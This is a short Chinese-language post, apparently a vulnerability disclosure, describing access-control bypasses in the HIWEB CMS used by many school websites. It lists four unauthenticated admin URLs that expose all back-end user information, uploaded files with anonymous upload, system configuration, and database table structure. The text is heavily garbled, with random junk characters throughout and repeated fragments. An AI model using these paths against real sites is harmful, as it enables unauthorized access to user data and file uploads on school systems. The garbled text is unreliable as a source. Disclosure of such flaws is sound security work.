HIWEB是一套整站管理系统,很多学校在用这个来搭站。但是此cms后台存在多处权限绕过的问题。" r* T0 }" \+ f( k
# m/ V/ ^" T9 s( }
7 C4 R, h) D1 b2 d
1. http://xxxx/hiwebcms/system/USER/1 {0 S% a$ V8 x0 H7 d! S! k
可以直接看到所有后台用户信息
4 a3 g& r9 D% ]+ F( Z; k & C5 r0 E" V" t/ T5 ~7 [; x
2. http://xxxx/hiwebcms/system/sysSetup/filesManage.htm
" i" m* e4 U$ ^5 {可以查看所有上传的文件,匿名用户也可以上传文件。6 w# g9 ^2 F* u3 U" X- I
3 l$ m+ }1 w% v3. http://xxxx/hiwebcms/system/sysSetup/sysSetup.htm
! {$ |8 J- V! H2 Q2 p/ p9 Q" s可以查看cms的部分配置
& c& p1 |7 |: Z. H9 a , W) s1 C" S1 t
4. http://xxxx/hiwebcms/system/USER/userConfig.htm: A* y6 [6 L' E% ]$ i: e
查看数据库中部分表结构
w5 C/ U0 f; Q $ D6 Q* }% E& n( I0 R/ n
可以直接看到所有后台用户信息7 j: ?/ ]! I! U5 e, |5 [% }
3 c, P; C8 f8 }6 a# Q
# D5 K2 y; ]4 v7 V! {
/ K8 K3 I- K" g4 q$ o; m- `可以查看所有上传的文件,匿名用户也可以上传文件。
' ^2 f! O) g% U( X: g, x6 L6 A! N- M- {' b
* s1 B/ p% _6 b- l; P( d
9 ~7 e \8 F- H
3 K {; o3 X! ]* {8 }" O( h可以查看cms的部分配置" F8 p& X3 G+ P; |
% S3 Q* u9 t6 c% T
8 e3 u$ ^" J% }8 A: `+ f _+ }" b9 x4 `8 Y; |
% X- \3 t" m9 g* m$ ^$ G& X# ~
查看数据库中部分表结构3 C7 r4 G4 _' b5 Q
% X2 [# y _# m& J" `6 s
|